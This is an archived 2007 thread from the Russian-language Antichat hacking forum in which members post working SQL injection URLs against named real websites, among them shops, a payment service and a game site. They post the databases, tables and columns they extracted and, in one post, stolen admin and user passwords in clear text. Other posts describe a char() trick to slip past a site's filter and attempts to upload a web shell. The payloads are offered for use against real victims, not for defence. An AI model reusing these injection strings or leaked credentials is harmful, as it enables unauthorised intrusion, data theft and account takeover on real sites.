ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3731  
Старый 17.11.2007, 02:56
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850

Репутация: 536
Отправить сообщение для А®ТеS с помощью ICQ
По умолчанию

Бага в юнекте (кто в танке - вот идешь ты пополнять баланс, а тут юнект...). Нашел Ув. Товарищ Dj_Bes и выложил в болталке за что очень несправедливо получил кучу брани в свой адрес. Инъекцию выкладывал не разработанную, я довел ее до ума, вот результаты:
5.0.40-log;unactpay@pechkin;unactpay_db
http://unactpay.ru/index.php?page=news&cur=1&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12, 13+from+INFORMATION_SCHEMA.tables+LIMIT+1,1/*
таблицы походу такие:
file
menu
news
offices
order_rent
page
partners
provider
terminal
terminal_category
terminal_type
filepriv не позволяет проводить операции с файлами =\.
 
Ответить с цитированием

  #3732  
Старый 17.11.2007, 03:06
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850

Репутация: 536
Отправить сообщение для А®ТеS с помощью ICQ
По умолчанию

З.Ы. Блин забыл - интересна табличка order_rent , я не вкурил кем она заполняеться но судя по названия (order - приказывать, но можно здесь перевести и как заказ) это табличка заказов. Это походу единственное что заслуживает внимания - http://unactpay.ru/index.php?page=news&cur=1&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,name,12,13+FRO M+order_rent/* например так.

Кодеры - явно барыги и добавили какую то кривую защиту. Т.е. для подбора имен полей пользоваться банальным WHERE+TABLE_NAME='vasya_pupkin' нельзя, нужно воспользоваться функцией char(), т.е. например WHERE+TABLE_NAME='vasya_pupkin' прерращаеться в WHERE+TABLE_NAME=char(118,97,115,121,97,95,112,117 ,112,107,105,110)

Последний раз редактировалось А®ТеS; 17.11.2007 в 03:33..
 
Ответить с цитированием

  #3733  
Старый 17.11.2007, 12:22
KEHT33
Познающий
Регистрация: 26.11.2006
Сообщений: 49
Провел на форуме:
65459

Репутация: 79
По умолчанию

Код HTML:
http://www.posibila.ro/index.php?ce=artisti&id=116+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
БД 4
 
Ответить с цитированием

  #3734  
Старый 17.11.2007, 16:01
MegaBits
Участник форума
Регистрация: 30.08.2006
Сообщений: 181
Провел на форуме:
1058786

Репутация: 45
По умолчанию

Код:
http://frozenfoods.ru/links.php?part_id=-27+union+select+login+from+users/*
Пользователи.
admin:yjvekg12
frozenfoods:irishka
buyer:enter
шелл залить не получаеться
/www/vhosts/frozenfoods.ru/html/func/admin.inc
 
Ответить с цитированием

  #3735  
Старый 18.11.2007, 12:59
sharoff
Познающий
Регистрация: 05.08.2007
Сообщений: 30
Провел на форуме:
242062

Репутация: 18
Отправить сообщение для sharoff с помощью ICQ
По умолчанию

Все скули ищутся вручную, или в частных случаях, самописными приватными программами, которые никто никогда не даст.

PS:
Цитата:
http://www.sosna.ru/?nid=-41+union+select+1,2,3,user(),version(),6/*
БД5. Если кто шелл зальет стукните в аську
 
Ответить с цитированием

  #3736  
Старый 18.11.2007, 22:37
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.fwdshop.ru/ - молодежная одежда, оптовая торговля

Код:
http://www.fwdshop.ru/index.php?gallery=-1+union+SELECT+1,concat_ws(char(58,58),user_id,user_email,password,password2)+FROM+fwd_users/*
Через limit перебираем пользователей. Позабавило то, что в поле password2 лежит зашифрованый пароль, а в password - в открытом виде, всегда бы так
 
Ответить с цитированием

  #3737  
Старый 18.11.2007, 23:02
Tyc00n
Познающий
Регистрация: 13.01.2007
Сообщений: 96
Провел на форуме:
575156

Репутация: 50
По умолчанию

Разбираем
Код:
http://www.football-equipment-uk.com/links.php?link_id=-99%20union%20select%201,2,3,4,5,6,7,8,9/*
Код:
http://www.vernunft-schweiz.ch/links.php?link_id=-999+union+select+1,2,3,4,5,6/*
Код:
http://danilka.com/links.php?link_id=-999+union+select+1,2,3,4,5,6,7,8,9/*
Код:
http://www.litriocht.com/shop/links.php?link_id=-999+union+select+1,2,version(),user(),5,6,7,8,9/*
Код:
http://www.dsp-es.com/vshop/links.php?link_id=-999+union+select+1,2,user(),version(),5,6,7,8,9/*
Код:
http://www.lickscycles.com/catalog/links.php?link_id=-999+union+select+version(),2,database(),user(),5,6,7,8,9,10/*
Код:
http://www.eoilcandles.com/catalog/links.php?link_id=-999+union+select+version(),2,database(),user(),5,6,7,8,9,10/*

Последний раз редактировалось Tyc00n; 18.11.2007 в 23:10..
 
Ответить с цитированием

  #3738  
Старый 19.11.2007, 01:05
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.thecorporatelibrary.com/

Код:
http://www.thecorporatelibrary.com/info.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(char(58),user_id,username,pword),10,11,12,13,14,15,16,17,18+from+users/*
Перебираем лимитом...


http://www.btleague.net/

Что-то напоминающее примитивную онлайн игру, но я так и не разобрался, не силен я в итальянском....

Код:
http://www.btleague.net/info.asp?id=1+or+1=(SELECT+TOP+1+usuario+FROM+USUARIO)--
Код:
http://www.btleague.net/info.asp?id=1+or+1=(SELECT+TOP+1+passw+FROM+USUARIO)--
Все колонки таблицы USUARIO: 'id_usuario','passw','fecha_registro','ultimo_logi n','email','usuario','imagen','bot','region','pais ','zona','ip_registro','activo','GM'

Таблицы:

'HISTORIAL_ECONOMICO','TIPO_CRIATURA','TIPO_GUARID A','GUARIDA','POBLADO','CAMPAMENTO','TIPO_INFRAEST RUCTURA','kill_kk','INFRAESTRUCTURAS','OBRAS','HAB ITANTES','ESTADISTICA_USUARIO','EJERCITOS','LEADER ','EJERCITO','CORREO','RETO','BATALLA','COMENTARIO S','SUCESOS','REQUISITOS','NOTICIAS','TROFEO','PRI SIONEROS_IP','TIPO_OFICIO','TRABAJADORES','FABRICA ','CONTROL','PAQUETES','PAQUETE','LIGAS','PARTIDOS ','CLASIFICACION','BTLEAGUE','GRUPOS','ACTA','USUA RIO','PROPIEDADES_USUARIO','VASALLOS'

Последний раз редактировалось Ded MustD!e; 19.11.2007 в 02:35..
 
Ответить с цитированием

  #3739  
Старый 19.11.2007, 05:46
t0ox
Новичок
Регистрация: 23.10.2007
Сообщений: 17
Провел на форуме:
105851

Репутация: 46
По умолчанию

http://www.folgreb.ru/news/article.php?id=-21+union+select+1,concat_ws(0x3a,version(),%20%20d atabase(),user()),3,4,5,6,7,8,9,10,11,12,13/*

5.0.45:folgrebru_site:folgrebru@81.177.16.61
 
Ответить с цитированием

  #3740  
Старый 19.11.2007, 11:00
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию

intercer.net
Код:
http://www.intercer.net/newstext.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*
4.1.22-standard:intercer_su:intercer_su@localhost

Последний раз редактировалось fRg; 19.11.2007 в 15:38..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT.XYZ